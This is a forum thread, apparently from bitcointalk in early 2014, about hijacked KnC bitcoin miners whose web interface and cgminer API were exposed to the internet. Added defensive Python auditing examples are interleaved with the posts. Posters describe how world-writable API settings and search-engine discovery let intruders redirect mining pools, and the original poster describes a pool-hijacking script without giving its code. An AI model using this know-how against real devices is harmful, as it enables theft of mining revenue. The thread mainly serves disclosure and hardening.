Date: Tue, 31 Dec 2013 20:23:39 GMT
Server: lighttpd/1.4.32

By the look of your results I know how you found them, but it's a very bad tool to use.
It will only bring up about +/- 130 results, and 3/4 of them are already dead.

pdawg (Sr. Member)
January 02, 2014, 05:54:46 AM
 #38

Steve is helping here.  He could have easily done this without posting anything and made a good amount of coin. Give the guy a break.

mostclicked (Newbie)
January 02, 2014, 07:11:54 AM
 #39

OP is not bluffing. I can retrieve the IP addresses of KnC Miners from an available search engine. The IP addresses are removed for security reasons. Search result examples:

Added on 01.01.2014
United States New York
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="354d48be494a88e6eccd16cdc7a1f67d", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Wed, 01 Jan 2014 05:39:41 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
United States Englewood
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="3b7e9df094c80de0a73e05bc14066075", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 22:50:39 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
Netherlands
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="71e7f1f82e328c05cf4d406705270c25", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 20:23:39 GMT
Server: lighttpd/1.4.32

By the look of your results I know how you found them, but it's a very bad tool to use.
It will only bring up about +/- 130 results, and 3/4 of them are already dead.

Yup it's bad. Just want to demonstrate the possibility of finding the IPs.
steve15 (OP) (Member)
January 02, 2014, 07:37:13 AM
 #40

Steve is helping here.  He could have easily done this without posting anything and made a good amount of coin. Give the guy a break.

A tip is also welcome :-D

bitpop (Legendary)
January 02, 2014, 03:11:15 PM
 #41

OP owes no one anything, he could have changed all your pools to his.

Second, who the hell opens the ports?

steve15 (OP) (Member)
January 02, 2014, 04:16:00 PM
 #42

OP owes no one anything, he could have changed all your pools to his.

Second, who the hell opens the ports?

The KnC itself opens port 80 by default.
Some really dumb (or unknowing, of course!) users also enable "ssh" and "CGMiner Remote Management Enabled" to make it even easier to exploit them.

Can you imagine they can't check their miner on their iPad? Better to open all ports!! ;-)

bitpop (Legendary)
January 02, 2014, 04:21:35 PM
 #43

OP owes no one anything, he could have changed all your pools to his.

Second, who the hell opens the ports?

The KnC itself opens port 80 by default.
Some really dumb (or unknowing, of course!) users also enable "ssh" and "CGMiner Remote Management Enabled" to make it even easier to exploit them.

Can you imagine they can't check their miner on their iPad? Better to open all ports!! ;-)

Yeah, but that port should never be open to the WAN.

mtbitcoin (Legendary)
January 03, 2014, 07:55:08 AM
 #44

Just as a heads up... I've had one of these boxes compromised. I've now firewalled the entire box.

However, I suspect there might be a scheduled script to restart the miner at preconfigured intervals to point to a specific pool. Any ideas as to where I should be looking to see if there were any backdoors or scheduled scripts/jobs?

Cheers


steve15 (OP) (Member)
January 03, 2014, 08:12:42 AM
 #45

Just as a heads up... I've had one of these boxes compromised. I've now firewalled the entire box.

However, I suspect there might be a scheduled script to restart the miner at preconfigured intervals to point to a specific pool. Any ideas as to where I should be looking to see if there were any backdoors or scheduled scripts/jobs?

Cheers




I did notice lots of miners already infected with a remote login called "nobody" in their configuration files.

It basically uses the same exploit, and totally took control over several miners.

It's mining at Eligius; once I stumble upon that specific hacker again, I'll post his pool address.

KnC, however, does not respond at all, let alone patch up their firmware to protect the users.

Note, even my Jupiter has been hacked and infected by this Eligius pool at specific times.

Execute code: userdel nobody in SSH.

Do not factory reset, as all these files are also infected.
It's not up to me to post details about how to remove this hacker, that's up to KnC, who clearly does not give a f*CK about it.


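A triage step for the "userdel nobody" advice in the post above, added here as an example; it is not KnC's firmware and not anything posted in the thread. Deleting "nobody" outright is the wrong reflex: on a Linux/BusyBox image "nobody" is a stock unprivileged account, so its mere presence proves nothing. What a responder actually wants to learn from /etc/passwd is whether any account besides root has UID 0, whether a system account has had its shell changed from a nologin shell to a real one, whether an account exists that the image never shipped, and whether a password hash has been planted directly in /etc/passwd. The two passwd files below are constructed samples, and the baseline account list is my assumption, not KnC's.

```python
"""Added example: triage /etc/passwd for backdoor accounts.  Not code from
KnC or the thread; the passwd samples and the baseline list are constructed."""

# Accounts a stock BusyBox-style image ships with (assumption: adjust to the
# image you actually have) and the shells that cannot be logged into.
BASELINE_ACCOUNTS = {"root", "daemon", "bin", "sys", "sync", "nobody", "www-data"}
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin",
                  "/bin/nologin", "/nonexistent", ""}


def parse_passwd(text):
    """Yield one dict per passwd line: name, pw, uid, gid, gecos, home, shell."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            yield {"name": line, "malformed": True}
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        yield {"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
               "gecos": gecos, "home": home, "shell": shell}


def audit_passwd(text, baseline=BASELINE_ACCOUNTS):
    """Return a list of (account, reason) findings; an empty list means nothing odd."""
    findings = []
    for acct in parse_passwd(text):
        name = acct["name"]
        if acct.get("malformed"):
            findings.append((name, "malformed passwd line"))
            continue
        can_login = acct["shell"] not in NOLOGIN_SHELLS
        if acct["uid"] == 0 and name != "root":
            findings.append((name, "second UID 0 account"))
        if acct["pw"] not in ("x", "*", "!"):
            findings.append((name, "password hash or empty password in /etc/passwd"))
        if name in baseline and name != "root" and can_login:
            findings.append((name, f"system account given login shell {acct['shell']}"))
        if name not in baseline and can_login:
            findings.append((name, f"account not in baseline with shell {acct['shell']}"))
    return findings


# Constructed samples: a clean image, and one with two implanted logins
# (nobody given a real shell, plus an extra UID 0 account with an inline hash).
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
"""
COMPROMISED_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
backup:$1$salt$notarealhash:0:0::/root:/bin/sh
"""

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_PASSWD), ("compromised", COMPROMISED_PASSWD)):
        print(label, audit_passwd(sample) or "no findings")
```

Run it against a copy of the miner's real /etc/passwd (`audit_passwd(open("/etc/passwd").read())`) and treat every finding as something to explain, not something to delete blindly; an account with a real shell can also carry an SSH key, so check its home directory before removing it.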
steve15 (OP) (Member)
January 03, 2014, 08:17:37 AM
Last edit: January 03, 2014, 06:59:44 PM by steve15
 #46

Edit, he just gained access to my miner again.

mtbitcoin (Legendary)
January 03, 2014, 08:46:33 AM
 #47

Edit, he just gained access to my miner again.

Cell phone screen shot of the hacker's pool



Do you have the entire box firewalled? Or are there still specific ports open to the public? I've blocked off all incoming ports and so far so good.



steve15 (OP) (Member)
January 03, 2014, 08:53:03 AM
 #48

Edit, he just gained access to my miner again.

Cell phone screen shot of the hacker's pool



Do you have entire box firewalled? Or are there still specific ports open to the public. I've blocked of all incoming ports and so far so good




I let him gain access; in my turn, I'll abuse his details.
I'm waiting for his next login attempt now.

But there is a big issue with the miners.

KnC takes no action on this matter.

steve15 (OP) (Member)
January 03, 2014, 08:57:38 AM
 #49

As far as I can see on my cell, it's a completely automated script. I think your firewall will be useless against this, since your box is already infected by it.

It will execute its code again; keep checking your SSH and cgminer terminal closely.

Can you confirm it was the same Eligius user?

padrino (Legendary)
January 03, 2014, 06:45:24 PM
 #50



I did notice lots of miners already infected with a remote login called "nobody" in their configuration files.

It basically uses the same exploit, and totally took control over several miners.

It's mining at Eligius; once I stumble upon that specific hacker again, I'll post his pool address.

KnC, however, does not respond at all, let alone patch up their firmware to protect the users.

Note, even my Jupiter has been hacked and infected by this Eligius pool at specific times.

Execute code: userdel nobody in SSH.

Do not factory reset, as all these files are also infected.
It's not up to me to post details about how to remove this hacker, that's up to KnC, who clearly does not give a f*CK about it.




nobody is a user and is there for running unprivileged items, a standard Unix construct across distros. If its shell was changed from /nonexistent then one needs to worry about it, but the user definitely exists on un-compromised boxes and is not an indication the box was compromised. With that said, I don't see it being used on any running binaries, so it may not be needed on this box; it just came as part of the BusyBox setup along with many of the other users.





Given some of the information kicking around this thread I decided to take a closer look at my Jupiters...

My Jupiters are completely behind a firewall so I can't say for sure, but this conversation made me wonder what might be going on outside of a possible SSH or HTTP compromise... The basic security profile of the boxes is rather open, but at its heart it's no different than a Linux distro with a default username/password, Windows, etc. Although KnC should do more in their documentation to discuss changing things, there are no actual vulnerabilities, just a weak security posture.

By default cgminer is open read/write for any address, and in one of the recent firmware updates I think KnC enabled it by default.

Perhaps it's direct cgminer connections on the cgminer port?

Two options exist to mitigate:

- Disable cgminer remote management on the mining page.

- Another is a manual edit of the cgminer.conf file (manual mode) to disable worldwide remote write access; change "api-allow": "W:0/0" to something more restrictive, for example W:192.168.0/24 if you only need access from 192.168.0.x addresses.

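A worked check for the api-allow fix in the post above, added here as an example; it is not KnC's firmware, not cgminer's own code, and not something padrino posted. It evaluates a cgminer "api-allow" string the way cgminer applies it, as I read its api.c (the first matching entry wins; a W: prefix grants write access and anything else is read-only; abbreviated addresses such as 0/0 or 192.168.0/24 are padded with zero octets the way inet_addr would), and then audits a constructed cgminer.conf with the weak setting beside the corrected one. The conf contents, the "trusted ranges" list and the first-match reading are my assumptions.

```python
"""Added example: evaluate a cgminer "api-allow" list and audit a cgminer.conf.
Not code from KnC, cgminer or this thread; the conf samples are constructed."""
import ipaddress
import json

# Ranges from which miner management is reasonable; anything wider gets flagged
# (assumption: adjust to your own management network).
TRUSTED_RANGES = [ipaddress.ip_network(n) for n in
                  ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _pad_ipv4(text):
    """cgminer accepts short forms like "0" or "192.168.0" (inet_addr style);
    pad the missing octets with 0 so ipaddress can parse them (assumption)."""
    octets = text.split(".")
    return ".".join(octets + ["0"] * (4 - len(octets)))


def parse_api_allow(api_allow):
    """Return [(group, network), ...] in list order.  Entry form is
    [GROUP:]IP[/PREFIX]; group "W" = write, anything else (or no group at all)
    = read only.  A missing prefix means a single host."""
    rules = []
    for entry in api_allow.split(","):
        entry = entry.strip()
        if not entry:
            continue
        group, sep, addr = entry.partition(":")
        if not sep:                      # bare IP: read-only access
            group, addr = "R", group
        host, _, prefix = addr.partition("/")
        net = ipaddress.ip_network(
            f"{_pad_ipv4(host)}/{prefix if prefix else 32}", strict=False)
        rules.append((group.upper(), net))
    return rules


def access_for(api_allow, client_ip):
    """Access a client gets: "W", "R" (or another group letter), or None when
    no entry matches and cgminer simply drops the connection.  First match
    wins, which is how I read cgminer's api.c (assumption)."""
    ip = ipaddress.ip_address(client_ip)
    for group, net in parse_api_allow(api_allow):
        if ip in net:
            return group
    return None


def audit_cgminer_conf(conf_text):
    """Findings for a cgminer.conf (JSON).  Empty list = nothing to complain about."""
    conf = json.loads(conf_text)
    if not conf.get("api-listen", False):
        return []                        # API switched off: nothing reachable
    allow = conf.get("api-allow", "W:127.0.0.1")   # cgminer's documented default
    findings = []
    for group, net in parse_api_allow(allow):
        trusted = any(net.subnet_of(t) for t in TRUSTED_RANGES)
        if group == "W" and not trusted:
            findings.append(f"write access from untrusted range {net}")
        elif not trusted:
            findings.append(f"read access from untrusted range {net}")
    return findings


# Constructed samples: the exposed setting described in the thread, and the fix.
WEAK_CONF = json.dumps({"api-listen": True, "api-network": True,
                        "api-allow": "W:0/0",
                        "pools": [{"url": "stratum+tcp://pool.example:3333",
                                   "user": "worker", "pass": "x"}]})
FIXED_CONF = WEAK_CONF.replace("W:0/0", "W:192.168.0/24")

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("fixed", FIXED_CONF)):
        print(name, audit_cgminer_conf(conf) or "ok")
    print("internet host on W:0/0 ->", access_for("W:0/0", "203.0.113.7"))
    print("internet host on W:192.168.0/24 ->",
          access_for("W:192.168.0/24", "203.0.113.7"))
```

The point the audit makes explicit: with "W:0/0" every address on the internet lands in group W, while with "W:192.168.0/24" an outside address matches nothing and the miner closes the connection without answering. Restricting api-allow only helps if the miner is not also port-forwarded; a forwarded connection still arrives from the public source address and is still rejected, but the safer posture is to not expose port 4028 at all.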
Sophokles (Hero Member)
January 04, 2014, 11:59:47 AM
 #51

Steve is helping here.  He could have easily done this without posting anything and made a good amount of coin. Give the guy a break.

A tip is also welcome :-D

Post a tip address in your signature then. You certainly did a big service to the (KnC) mining community. Thumbs up from me.

philipma1957 (Legendary)
January 04, 2014, 10:52:52 PM
 #52

Well, as annoyed as I was about the OP's posting, I will concede more than likely he is not the person that has crashed my group's 2 miners.

Fact remains we have 1100gh dead in the water. Since I don't run the gear and am a part owner, I did direct our group's managers to this thread.

We are still not hashing. I have to think our gear was hacked in the method described above.

We were hacked before this was posted, so I can't say the OP helped a hacker via this post to be able to attack us, and my apology for my complaint against you. Since I just own a piece of the 1100gh pie I don't have full access to the records; I can only say I have been told it hashes and nothing gets reported to our account.

https://bitcointalk.org/index.php?topic=334360.msg4310852#msg4310852


You know, as fucking paranoid as BTC has made me, I would not be surprised if a KNC employee did this. Does not matter; the fact remains that more than 1 Jup was attacked in more than 1 location. Oh well.

kikikuku (Newbie)
January 05, 2014, 02:38:32 AM
 #53

thank you !!!
bitpop (Legendary)
January 05, 2014, 06:44:42 AM
 #54

Well, as annoyed as I was about the OP's posting, I will concede more than likely he is not the person that has crashed my group's 2 miners.

Fact remains we have 1100gh dead in the water. Since I don't run the gear and am a part owner, I did direct our group's managers to this thread.

We are still not hashing. I have to think our gear was hacked in the method described above.

We were hacked before this was posted, so I can't say the OP helped a hacker via this post to be able to attack us, and my apology for my complaint against you. Since I just own a piece of the 1100gh pie I don't have full access to the records; I can only say I have been told it hashes and nothing gets reported to our account.

https://bitcointalk.org/index.php?topic=334360.msg4310852#msg4310852


You know, as fucking paranoid as BTC has made me, I would not be surprised if a KNC employee did this. Does not matter; the fact remains that more than 1 Jup was attacked in more than 1 location. Oh well.

Your paranoia should lead you to the group leader. This thread was just a coincidence.

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 05, 2014, 04:00:48 PM
 #55

WARNING

I just found out that ANY miner with remote CGMINER enabled can be controlled remotely!!
I will NOT post how, but it seems that lots of hackers have already found out this exploit.

Nothing difficult, it uses a default cgminer script on your rig.

By default, the "enable cgminer options" setting is activated on KnC rigs. In the cgminer configuration files, this defaults to accepting connections from any IP, worldwide.

I made a simple script, removing every user from the pools, adding my own pool, and setting priority to 0.
This script loops every 2 seconds, making sure that nobody else mines on the rig except me.


Invisible to the KnC user, he will only notice his pool does not add up.
I can even play safe, and make it schedule every X time.

Now, if i can make this script, so can anybody else!

!!! PLEASE DISABLE 'Enable cgminer remote' OPTION !!!

This can be used WITHOUT security, worldwide, by ANYONE !!

You have been warned...


Disclaimer: i did NOT use or abuse any rig except mine !!
Feel free to tip me for saving your multiple coins  Wink

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
padrino
Legendary
*
Offline Offline

Activity: 1428
Merit: 1000


https://www.bitworks.io


View Profile WWW
January 05, 2014, 04:03:01 PM
 #56

WARNING

I just found out that ANY miner with remote CGMINER enabled can be controlled remotely!!
I will NOT post how, but it seems that lots of hackers have already found out this exploit.


Umm, look at my post further up the thread from two days ago, I discuss this possibility and how to mitigate it..

1CPi7VRihoF396gyYYcs2AdTEF8KQG2BCR
https://www.bitworks.io
Phoenix1969
Legendary
*
Offline Offline

Activity: 938
Merit: 1000


LIR DEV


View Profile
January 05, 2014, 05:30:57 PM
 #57

Thanks a lot for exploiting every KNC customer...   You went about this totally wrong.
although I appreciate the "heads up"... should have been given to Ckilovas and the KNC code boys when they return on the 7th
You literally just taught 1000 hackers how to steal....  great job   uuuuuggh


ncs0ne
Full Member
***
Offline Offline

Activity: 147
Merit: 100


software developer


View Profile
January 05, 2014, 06:02:59 PM
Last edit: January 05, 2014, 06:31:43 PM by ncs0ne
 #58

This security issue concerns HTTP Digest authentication over plain HTTP in general.
It's even mentioned in the corresponding RFC:

Digest Authentication offers no confidentiality protection beyond protecting the actual password. All of the rest of the request and response are available to an eavesdropper.

...

Many needs for secure HTTP transactions cannot be met by Digest Authentication. For those needs TLS or SHTTP are more appropriate protocols. In particular Digest authentication cannot be used for any transaction requiring confidentiality protection.

...

Both Digest and Basic Authentication are very much on the weak end of the security strength spectrum.


I'm wondering whether KnCMiner will reply at all to the OP, as their reseller portal and their forum don't make use of HTTPS either.
It's not that they are not aware of it; it seems more like they do not want to spend time and money on this.

http://forum.kncminer.com/forum/resellers-affilicates/general-questions/761-https-for-the-forum
http://forum.kncminer.com/forum/resellers-affilicates/general-questions/23414-ssl-please

This one has been removed from the KnC forum as it seems, check post 12.1:
http://webcache.googleusercontent.com/search?q=cache:07UiAUGwVhYJ:forum.kncminer.com/forum/main-category/hardware/21601-saturn-hacked-btcguild-account-hacked-be-careful-guys


And therefore I do not expect a reaction or change.

Sam
KnC Administrator

    Join Date: Aug 2013
    Posts: 12

#5
9th September 2013, 10:04 AM
SSL is on its way

Hope is gone, as I sent an email myself some weeks ago concerning this.

padrino
Legendary
*
Offline Offline

Activity: 1428
Merit: 1000


https://www.bitworks.io


View Profile WWW
January 05, 2014, 06:25:08 PM
 #59

This security issue concerns HTTP Digest authentication over plain HTTP in general.
It's even mentioned in the corresponding RFC:

Digest Authentication offers no confidentiality protection beyond protecting the actual password. All of the rest of the request and response are available to an eavesdropper.

...

Many needs for secure HTTP transactions cannot be met by Digest Authentication. For those needs TLS or SHTTP are more appropriate protocols. In particular Digest authentication cannot be used for any transaction requiring confidentiality protection.

I'm not sure what you are trying to imply here.. The use of HTTP digest and lack of HTTPS isn't a security issue by itself.

The data available in the web page does not require confidentiality, there isn't really any reason of value to protect it.

Digest provides protection against the password being read if someone is packet sniffing. Replay attacks are still possible if lighttpd does not use timestamps but even then someone would need to be in a position to packet sniff the segments between the user and the miner and also implement a replay attack. It's unlikely.


1CPi7VRihoF396gyYYcs2AdTEF8KQG2BCR
https://www.bitworks.io
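The two posts above (#58 and #59) argue about what HTTP Digest actually protects. Worked example, added here and not part of either post, of RFC 2617 Digest with qop=auth from both sides: the client computes the response so that only HA1 depends on the password (username, realm, nonce, uri, nc, cnonce and the response itself all travel in the clear, which is ncs0ne's point), and the server stores HA1 rather than the password, binds each nonce to an issue time and rejects a reused nonce-count, which is the timestamp-based replay defence padrino refers to. The realm string is the one quoted in this thread; the user name, password, URI and timestamps are constructed for the demo.

```python
import hashlib
import hmac
import os
import time

# Realm string exactly as it appears in the WWW-Authenticate header quoted in this thread.
REALM = "KnC Miner configuration"
# Per-process secret used to bind nonces to a timestamp (constructed; a real server persists it).
SERVER_SECRET = os.urandom(16)


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def make_nonce(now=None):
    """Server side: issue nonce = '<unix-time>:<hmac tag>' so it can later be expired and checked."""
    ts = str(int(time.time() if now is None else now))
    tag = hmac.new(SERVER_SECRET, ts.encode(), "sha256").hexdigest()[:16]
    return f"{ts}:{tag}"


def nonce_is_fresh(nonce, max_age=300, now=None):
    """Server side: accept only nonces we issued ourselves that are at most max_age seconds old."""
    ts, _, tag = nonce.partition(":")
    if not ts.isdigit():
        return False
    expected = hmac.new(SERVER_SECRET, ts.encode(), "sha256").hexdigest()[:16]
    if not hmac.compare_digest(tag, expected):
        return False
    now = time.time() if now is None else now
    return 0 <= now - int(ts) <= max_age


def digest_response(user, password, method, uri, nonce, nc, cnonce, realm=REALM, qop="auth"):
    """Client side (RFC 2617, qop=auth). Only HA1 depends on the password; every other
    field of the Authorization header is visible to anyone on the path."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


class DigestVerifier:
    """Server side check: keeps HA1 per user (never the clear password) and rejects replays by
    requiring a fresh nonce and a strictly increasing nonce-count for that nonce."""

    def __init__(self, users, realm=REALM):
        self.users = {u: _md5(f"{u}:{realm}:{p}") for u, p in users.items()}
        self.highest_nc = {}  # nonce -> highest nc already accepted

    def verify(self, auth, method, now=None):
        ha1 = self.users.get(auth.get("username"))
        if ha1 is None or not nonce_is_fresh(auth["nonce"], now=now):
            return False
        nc = int(auth["nc"], 16)
        if nc <= self.highest_nc.get(auth["nonce"], 0):
            return False  # same nonce/nc seen before: a replayed header
        ha2 = _md5(f"{method}:{auth['uri']}")
        expected = _md5(f"{ha1}:{auth['nonce']}:{auth['nc']}:{auth['cnonce']}:{auth['qop']}:{ha2}")
        if not hmac.compare_digest(expected, auth["response"]):
            return False
        self.highest_nc[auth["nonce"]] = nc
        return True


def replay_demo(max_age=300):
    """Constructed exchange: one legitimate request, the identical header replayed, and the
    identical header presented after the nonce has expired. Returns the three verdicts."""
    server = DigestVerifier({"operator": "constructed-password"})
    t0 = 1_700_000_000
    nonce = make_nonce(now=t0)
    auth = {"username": "operator", "nonce": nonce, "uri": "/status",  # URI is constructed
            "nc": "00000001", "cnonce": "0a4f113b", "qop": "auth"}
    auth["response"] = digest_response("operator", "constructed-password", "GET",
                                       auth["uri"], nonce, auth["nc"], auth["cnonce"])
    first = server.verify(auth, "GET", now=t0 + 5)
    replayed = server.verify(auth, "GET", now=t0 + 10)  # same header again: nc not increased
    late_server = DigestVerifier({"operator": "constructed-password"})
    stale = late_server.verify(auth, "GET", now=t0 + max_age + 1)  # nonce older than max_age
    return first, replayed, stale


if __name__ == "__main__":
    print(replay_demo())
```

The nonce format (time plus HMAC tag) is one common way to give a server the "timestamps" padrino mentions without keeping every issued nonce in memory; whether the lighttpd build on the miners does this is not something the thread establishes.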
ncs0ne
Full Member
***
Offline Offline

Activity: 147
Merit: 100


software developer


View Profile
January 05, 2014, 06:39:26 PM
 #60

At least for privacy reasons I'd prefer in general some data to be sent encrypted.
Like my stats and worker logins (in the case of Eligius, the payout address).
In addition I prefer to be secure against script-kiddie MITM attacks while I'm travelling.

Next gen of HTTP (2.0) is discussed to be encrypted by default as far as I know.
Why, there's no need to encrypt your traffic while you read the news or whatever.

padrino
Legendary
*
Offline Offline

Activity: 1428
Merit: 1000


https://www.bitworks.io


View Profile WWW
January 05, 2014, 06:49:50 PM
 #61

A number of claims have been made on this thread about possible hacks, even the OP himself, although seemingly well intentioned doesn't seem to understand the basics of Linux security.. Odd given the claims by the OP of being a penetration tester with many years of experience but I suppose that is beside the point.

To summarize the situation there doesn't seem to be any actual vulnerabilities (as in software bugs) being exploited, rather people seem to be taking advantage of the weak security posture of the miners when the default configuration has not been changed.

Given the situation there are some things that can be done in code to improve the security posture of the systems out of the box but in lieu of that I'm providing the following recommendations on what any user can do to improve the security posture of the systems.

If you have changed the password for the miner it's unlikely there was an actual system compromise, more likely it's been remote access via cgminer like I mentioned in this thread a couple of days ago, and the OP apparently just picked up on.

If you suspect you have had system files on the miner changed it is best to reload the factory image on the system using an SD card, reference https://www.kncminer.com/pages/troubleshooting. If you had changed the password before putting it on the internet check the below options as this is unlikely and instead it was most likely access via cgminer itself.

First, the OP himself said he found a "nobody" user on his system and made claims he had been hacked, it is NOT an indication of a hack, that is a standard user used for running unprivileged items and is on the system.

Now onto the options for securing the system, some odd 2 second script like the OP suggests isn't needed, simply protect the system properly and it will stay secure.

1. Firewall the system from remote access, there is no reason any port on a KNC Miner needs to be accessible on the open internet, it works fine from behind a NAT on a home router, etc.. If you need remote access recommend a VPN solution as an option.

If you would like to limit exposure but still keep it online I suggest the following.

2. As discussed in an earlier post I made, disable cgminer remote admin, or limit remote admin. All things considered this seems to be the most likely access point. Definitely disable remote admin unless it's needed; if it is, limit it to a specific set of IP addresses.

Quote
- Another is a manual edit of the cgminer.conf file (manual mode) to disable world wide remote write access will take care of it, change   "api-allow": "W:0/0" to something more restrictive, for example W:192.168.0/24 if you only need access from 192.168.0.x addresses.

1CPi7VRihoF396gyYYcs2AdTEF8KQG2BCR
https://www.bitworks.io
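Padrino's post above (#61) comes down to one config key: `api-allow` with `W:0/0` hands privileged cgminer API access to any address that can reach the port. The following is an added example, not code from the thread or from cgminer, that audits a cgminer.conf for exactly that: it parses the `[G:]IP[/prefix]` entries, pads the shorthand cgminer accepts (`0/0`, `192.168.0/24`) to full dotted-quad networks, and flags entries that are world-open or on public ranges. The sample configs are constructed; the assumption that a bare address without a group letter is read-only (`R`) and that an absent `api-allow` defaults to `W:127.0.0.1` follows the cgminer API documentation as I recall it and is marked in the code.

```python
import ipaddress
import json

# Constructed samples (not taken from any real miner). The first mirrors the world-writable
# "W:0/0" setting the post warns about, the second the restricted form it recommends.
WEAK_CONF = '{"api-listen": true, "api-allow": "W:0/0", "api-port": "4028"}'
HARDENED_CONF = '{"api-listen": true, "api-allow": "W:127.0.0.1,W:192.168.0/24", "api-port": "4028"}'
DISABLED_CONF = '{"api-listen": false, "api-allow": "W:0/0"}'


def _normalise(addr):
    """Pad cgminer shorthand such as '0/0' or '192.168.0/24' to dotted-quad so ipaddress accepts it."""
    ip, _, prefix = addr.partition("/")
    while ip.count(".") < 3:
        ip += ".0"
    return f"{ip}/{prefix}" if prefix else ip


def parse_api_allow(value):
    """Split an api-allow string into (group, IPv4Network) pairs.

    Entries are comma separated, e.g. 'W:192.168.0/24' (privileged) or 'R:10.0.0.5' (read-only).
    Assumption: an entry without a group letter is read-only ('R'). IPv4 only.
    """
    entries = []
    for item in value.split(","):
        item = item.strip()
        if not item:
            continue
        group, sep, addr = item.partition(":")
        if not sep:
            group, addr = "R", item
        entries.append((group, ipaddress.ip_network(_normalise(addr), strict=False)))
    return entries


def audit_api_allow(value):
    """Return (entry, risk) pairs for api-allow entries that expose the API beyond a LAN."""
    findings = []
    for group, net in parse_api_allow(value):
        entry = f"{group}:{net}"
        if net.prefixlen == 0:
            findings.append((entry, "open to every address on the internet"))
        elif not net.is_private:
            findings.append((entry, "public address range"))
        elif group == "W" and net.num_addresses > 256:
            findings.append((entry, "privileged access from a large private range"))
    return findings


def audit_config(conf_text):
    """Audit a cgminer.conf JSON document for remote API exposure."""
    conf = json.loads(conf_text)
    if not conf.get("api-listen", False):
        # With api-listen off the API socket is never opened, so api-allow is irrelevant.
        return {"api_listen": False, "findings": []}
    # Assumption: cgminer's built-in default when api-allow is absent is W:127.0.0.1.
    return {"api_listen": True, "findings": audit_api_allow(conf.get("api-allow", "W:127.0.0.1"))}


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF), ("disabled", DISABLED_CONF)):
        print(name, audit_config(text))
```

Run it against the cgminer.conf pulled from a miner over SSH; an empty findings list with `api-listen` true means the API is reachable only from the listed ranges, which still leaves the firewall advice in point 1 of the post as the primary control.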
bitpop
Legendary
*
Offline Offline

Activity: 2912
Merit: 1060



View Profile WWW
January 05, 2014, 07:09:36 PM
 #62

I don't see any issue, this is just fud. If you have a router you're safe. Tell me how the hell this miner opens ports when bitcoind with upnp can barely do it.

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 05, 2014, 09:11:25 PM
 #63

Padrino is right for the most part.

The remote CGminer exploit can be executed without privileges on the system.
As my tests with a specific port scanner prove, the high port number cgminer uses by default is not always closed by the router.

My own router had the port 'filtered', but not closed. That's how I got my cgminer hacked.

Padrino, about the 'Nobody' user, like posted, I was looking via my smartphone in a quick hurry via SSH.
While I was losing about 5Th/s to a hacker, please excuse me for posting a reply too fast  Wink

So, lesson learned here. DISABLE the remote CG management, and you're safe.
Well, at least from the remote CG exploit...

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
sickpig
Legendary
*
Offline Offline

Activity: 1260
Merit: 1008


View Profile
January 05, 2014, 10:50:17 PM
 #64


1. Firewall the system from remote access, there is no reason any port on a KNC Miner needs to be accessible on the open internet, it works fine from behind a NAT on a home router, etc.. If you need remote access recommend a VPN solution as an option.


This.

Never ever expose your miner directly to the internet.

Do not assign a public IP to the miner network interface.

Even if you're using a private address for your miner do not trust your router fw/firewall.

Router firmwares are updated once in a very long while; they reach support EOL quite rapidly. Taking this into account implies using your router port forwarding is moot.

Use a bridge system between your router and your miner(s). Be it a hardened Linux box or an OpenBSD one.

Set up a firewall on this machine that does both ingress/egress filtering. Set up a VPN service on this bridge box. Access the miner only through this VPN service.

If you do not have a static IP spend a few bucks a month for a VPS with a static IP address and use n2n (a layer two p2p VPN) to mimic a more classic VPN set up.

Bitcoin is a participatory system which ought to respect the right of self determinism of all of its users - Gregory Maxwell.
MiningBuddy
Hero Member
*****
Offline Offline

Activity: 927
Merit: 1000


฿itcoin ฿itcoin ฿itcoin


View Profile
January 07, 2014, 10:52:09 AM
 #65

When I used to mine I never had a miner exposed to the internet, instead if I wanted to do any remote work I would SSH into a laptop that was open to the internet and on my miners network then SSH into my miners or however they were managed. This is fine as long as the bridge (laptop) is secure in this instance.

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 15, 2014, 04:43:26 PM
 #66

KnC released a new firmware with all my points emailed to them taken into account.

THANK YOU KNC

However....

The new firmware has a HUGE security flaw. BUT...

Since KnC does not even thank me for writing a detailed report, consuming several hours of my time, it's not worth it to me to write another one.
They DID implement every bugfix and security improvement I emailed them, and are now taking credit for it... Lame ass f*ckers!

If the script kiddies find out this new (ridiculous) bug in the miners, rest assured that many rigs will be taken over.


Quote
We have a new firmware for you today, version 0.99.2 firmware which can be downloaded from our firmware page here: https://www.kncminer.com/pages/firmware The firmware contains the following changes.
